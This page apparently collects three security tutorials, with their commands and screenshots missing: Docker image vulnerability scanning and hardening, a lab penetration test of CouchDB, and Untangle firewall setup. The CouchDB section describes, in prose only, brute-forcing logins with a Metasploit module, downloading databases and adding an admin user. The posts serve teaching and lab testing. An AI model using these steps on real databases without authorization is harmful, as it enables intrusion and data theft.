Docker for Pentester: Image Vulnerability Assessment

We are moving from virtualization to containerization and we are all familiar with the container services such as docking or quay.io. You can pick a dock image for a particular application by selecting several choices. As you know, when a developer works with a container, it not only packs the program but is part of the OS, and we do not know whether the connect libraries have been patched or vulnerable.

So, we will show “how to perform a container audit and vulnerability assessment” in any infrastructure in this role.

Table of Contents

Prerequisites

Clair

  • Installation
  • Docker Image Vulnerability Scanning

Bench-security

  • Installation
  • Container Hardening

Prerequisites

At your host machine, Install docker and pull an image, you want to scan.

Clair: Vulnerability

Installation

CoreOS has created an awesome container scan tool called Clair. Clair is an open-source project for the static analysis of vulnerabilities in apps and Docker containers. You can clone the package with the help of git, using the following command

The scanner is developed in go language, therefore golang on your local machine over which is docker is running.

Build the library to install all dependencies of the Clair.

As you can see, we have the following file in the bucket list.

If in your host machine, you don’t have a docker image, you can pull a new image, as we did here to illustrate vulnerability assessment.

Now, run the docker image of the Clair that will listen at local port 5432.

Also, run the docker image for postgres to link Clair scan with the help of the following command.

Now, let’s use the Clair for scanning the vulnerability of a container or docker image, with the help of the following command.

Syntax: ./clair-scanner -ip <docker ip> -r output.jason <docker-image>

Booom!!!! And we got the scanning output which is showing 50 unapproved vulnerabilities.

Bench-Security: Container Hardening

The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated and are inspired by the CIS Docker Benchmark v1.2.0.

So, as you can see, we have a few docker images on our host.

Let’s start docker audit for container hardening by executing a set of command as shown here.

The output results as Info, Warning, Pass and Notes for each of the configuration recommendations as mention below:

  1. Host Configuration
  2. Docker Daemon Configuration
  3. Docker Daemon Configuration Files
  4. Container Images and Build Files
  5. Container Runtime
  6. Docker Security Operations

Let me explain this in a better way: You can observe in the highlighted session that it has created alert against root privilege for running the docker image.

To fix such type of misconfiguration, stop the running process for docker and then again, run the docker image with low privilege user access as shown below.

If the loophole is closed, use the bench again for cross-validation and this time ensure you have passed the warning. As you can see, this time we got the Green sign that shows we got the loopholes patched.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information SecurityContact here

Penetration Testing on CouchDB (5984)

What is CouchDB

CouchDB is a Free and open-source fault-tolerant NoSQL database developed by Apache software foundation. It uses JSON, to store data, javascript as its query languages and It includes RESTFUL API to transmit data over HTTP.

CouchDB Features

  • CouchDB have REST API that is based on HTTP which helps to communicate with database easily.
  • It stores the data in Semi-structured format that are flexible with individual implicit structures also you can store data in a flexible structure format.
  • Users of CouchDB have the option of powerful Data Mapping, which allows users to Querying, Combining and Filtering of the information.

              

In this post, we will demonstrate how to set-up our own Vulnerable CouchDB for penetration testing on Ubuntu 20.04.1 and how to conduct CouchDB penetration testing.

Table of Contents

  • Pre-requisites
  • CouchDB setup on Ubuntu 20.04.1
  • CouchDB penetration Testing
  • Scanning: Nmap

Prerequisites

To configure CouchDB in your Ubuntu platform, there are some prerequisites required for installation.

  • Ubuntu 20.04.1 with minimum 4GB RAM and 2 CPU
  • Root Privileges
  • Apache server
  • Attacker Machine: Kali Linux
  • Enumeration
  • Exploiting: Metasploit

CouchDB Setup on Ubuntu 20.04

Let’s start with installing the apache server first

Apache is an open-source HTTP based web server that’s available for Linux servers free of charge we can install it via terminal simply by running the following command.

In order to install CouchDB first, we need to Enable CouchDB repository. Let’s start it by adding GPG key into the system by entering the following command.

After adding the repository add the GPG key into the CouchDB repository by entering following command.

Now, the repository is enabled we can directly install CouchDB by entering following command.

Then a prompt will occur on the screen select the standalone option from it or as per your requirements

Then Next, you’ll be given an option to set the IP address of the network interface, enter IP of your system or server machine to bind it with CouchDB.

On the next Prompt After entering the IP of a server machine, create a password for the admin user of CouchDB then next confirm your password and then installation will continue.

Now start and Enable CouchDB server in Ubuntu and check the server status by entering the following command

Congratulations! You have successfully installed CouchDB in your Ubuntu platform. Now you can directly access CouchDB on your favourite Browser just ping following URL.

Use your credentials to login to the CouchDB database.

Now create a new admin for the server

After creating the admin now create a new database for the server

The database is created successfully

Let’s just some data into the database that we have created you can do it directly by the GUI interface but in my, I’m good with command line to do this follow the below commands.

Hurray! We’ve successfully created the database.

Let’s start Pentesting CouchDB

In this section, you will be learning how to compromise the Database using different techniques.

Let’s fire up Attacking machine Kali Linux

Nmap

By default, CouchDB service is running on the port no.  5984 with the help of NMAP, let’s identify the state of port.

As you can see, it has open state for CouchDB at port 5984

Enumeration

NMAP have capability to perform Automatic Enumeration to perform this attack follow the below commands.

As you can see, it provides quite enough information about the database that helps us to brute-forcing or in dumping the credentials.

Exploiting: Metasploit

Module: couchdb_login

Let’s brute force the target. To perform this attack, you should go with the following module by entering the following command by firing up the msf console

Great! now you have login credentials of the database.

Now using that credentials, we can use curl command download whole databases created in the server

We also can create our user for the server using the curl command

Also, you can check for the user-created using curl command

Now you have admin access of the whole database In manner to perform more attacks you can use exploits listed on MSF console.

In this way, we can test for CouchDB loopholes and submit the findings to the network admin 😊.

Author – Paras khorwal is a Certified Ethical Hacker, Technical writer and Penetration Tester at Hacking Articles. Technology and Gadget freak. Contact Here

Firewall Lab Setup: Untangle

What is a Firewall? a firewall is a network security system that monitors and controls the incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted internal network and untrusted external network, such as the Internet. Wikipedia

Firewalls are also categorized as network firewalls and firewalls depending on the host. Network firewalls filter and run on network hardware from two or more networks. Firewalls based on host computers run in and out of such devices and control network traffic.

Here are the major types of firewalls.

  • First-generation: Packet-filtering firewalls
  • Circuit-level gateways
  • Stateful packet inspection
  • Application-level gateway

Table of Contents

  • Downloading untangle-15.1.0-amd64.ova
  • Introduction of Untangle NG Firewall?
  • Creating Virtual Machin with VMWare Workstation
  • Configuration of Untangle
  • Configuration of Untangle APPS Part I: Web Filtering & SSL Inspector

Introduction of Untangle NG Firewall

Untangle is NGFW/UTM software, bringing together everything your network needs to stay healthy on one box: web content and spam filtering, virus scanning, VPN connectivity, multi-WAN failover capability and much more. With a web-based friendly interface to help you track and filter traffic in your network, it is essential for us to make deployment and management simple.

Requirement: Minimum 2GB RAM, Dual-Core processor, 8 GB hard drive space and minimum 2 LAN cards are required.

Creating a Virtual Machin with VMWare Workstation

Once untangle.ova file is downloaded Doble click and setup will start.

The Setup Wizard will open automatically when Untangle first boots.

Language selection

Before you begin the setup wizard, select your preferred language.

The next screen simply welcomes you to the Setup Wizard. Click next to continue. Untangle Software License click on Agree

Configure the Server, In the first step, you have set a password and select a time zone for the administrator account. The admin e-mail can also be listed for warnings and reports. Optional method of installation.

Now Click on Network Cards

Identify Network Cards, you can simply start with the next move if it’s an Untangle unit.

Note: Be sure that the physical network cards are configured with the right (wanted) interface if this is a custom server.

Configures Interface

The default selection is Auto (DHCP). The automatically assigned address is displayed if an address was successfully acquired. Otherwise, click Renew DHCP to acquire an IP address. Click Test Connectivity to verify Internet access

 

Configure your Internal network interface

Configure your “Internal” interface (and DHCP server and NAT configuration.) There are two choices NAT or Bridge.

Untangle is the edge unit on your network in router mode and acts as a firewall and router. In this case, you would need to correctly configure your external and internal interfaces for traffic to flow.

We must configure the internal interface and allow DHCP and NAT (Network Address Translation) with private static IP addresses to share one public IP on all the internal machines. It is generally called router mode.

In my testing lab I am not enabling DHCP

Automatic Upgrades are configured

If Automatic Upgrades is enabled, NG Firewall automatically checks for new versions and performs the upgrade.

In my testing lab I am not enabling “Connect to Command Center”

Setup Wizard – Finished That’s it!

Click on Go to Dashboard

Configuration of Untangle

In part one we are going to learn how to configure web filtering

Congratulations! Untangle is ready to be configured Click on Continue

The next steps include registration.

After finishing registration click on continue

Now installing the desired apps and possibly tuning the configuration of Untangle NG Firewall. In my testing Lab, I am going with Install the recommended APPS.

Recommended apps now installed as you can see on the screen and you can install available Apps as per requirements. On the Apps tab you will see the currently installed apps. 

Let’s come to the Dashboard of untangle & you can see almost all the information in one page.

To identify the configuration of Untangle network cards you can navigate to Config tab

The config tab holds all the settings related to configuration of the Untangle server itself and settings for components of the platform that apps may interact with.

Configuration of Untangle APPS Part I: Web Filtering

Let’s use the Windows 10 system as untangle client

This client is an internal system and we will set default gateway 192.168.2.1 <IP of Untangle firewall>.

Now you can see the Internet is working and Social networking site Facebook.com is opening.

Block Categories

Now come back to the Dashboard of untangle Firewall go to Apps > web Filter > Categories Tab > Social Networking

Categories Tab: Categories allow you to change which website categories are blocked or highlighted. Blocked categories show the user’s block page; flagged categories allow the user to access the site but will be secretly flagged as an infringement for event logs and reports. For all Web Filter options, these block / flag actions function the same way.

Now for our testing lab, we are going to block Social Networking Sites. And click on Save.

Now you can see on client system Social Networking Site www.facebook.com is blocked and not opening.

 

Lookup Site Tab

 

Now again come to the untangle Dashboard: app > web filter > Site Lookup

Lookup Site offers you the possibility to categorize a URL. A dialogue is generated by clicking on it. In the Web URL, enter the URL for the categorization of the URL and click search.

Now we are searching for www.hackingarticles.in site, click on the Search tab and see the result.

Block Sites Tab

Now again come to the untangle Dashboard: app > web filter > Block Site

Under Block Sites, you can add individual domain names you want to be blocked or flagged – just enter the domain name (e.g. youtube.com) and specify your chosen action.

We are going to block www.ignitetechnologies.in site

Click on add > and type your site which you want to block. Then click on done.

And then click on save.

Let’s check on the client System.

Type site www.ignitetechnologies.in and J Bingo now the site is blocked.

Pass Sites Tab

Now again come to the untangle Dashboard: app > web filter > Pass Sites

Pass Sites is used to pass content that would have otherwise been blocked. This can be useful in “unblock” pages, which are not blocked by block settings.

Also if blocked with category or individual URLs, domains which you add to the Passed Sites lists will be permitted-just add and save the domain. When the pass option is unchecked, the link can be blocked as though the entry is not open.

I am going to pass www.linkedin.com/ site as an example.

Click on add > type required site and Done.

Then click on save.

Now on client system, open browser and type www.linkedin.com/ in URL, see the resulting Site is opening.

Pass the Client

Let’s add another client and that client IP is 192.168.2.11 and default gateway is 192.168.2.1 untangle IP.

On this system, Let’s try to open www.linkedin.com site and see the result this site is under the web filter block category.

Now again come to the untangle Dashboard: app > web filter > Pass the Client

Pass Clients Tab: If you add an IP address to this list, Web Filter will not block any traffic from that IP regardless of the blocked categories or sites.

 Just add the IP 192.168.2.11 & Enable the pass option, then save the configuration as followed in the given image.

Now on the client system, open browser and type www.linkedin.com J bingo see the result this system is working perfectly from Pass Clients settings option.

About SSL Inspector

The SSL Inspector is a special application that allows other Untangle applications processing HTTP traffic to process encrypted HTTPS and SMTP processing applications to process SMTP also via SSL. The software does this by manually encoding and encrypting SSL traffic via the Untangle server for verification by certain applications and services.

Navigate to Apps > SSL Inspector; Turn ON the SSL inspector for the HTTP site.

Now let’s check on the client site, open browser and type any site name in URL.

Now you can see after SSL Inspector is enabled all sites are blocked.  

How these sites will work on the client system with SSL Inspector to continue on Configuration of Untangle APPS Part II.

Author: Rajesh Bora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here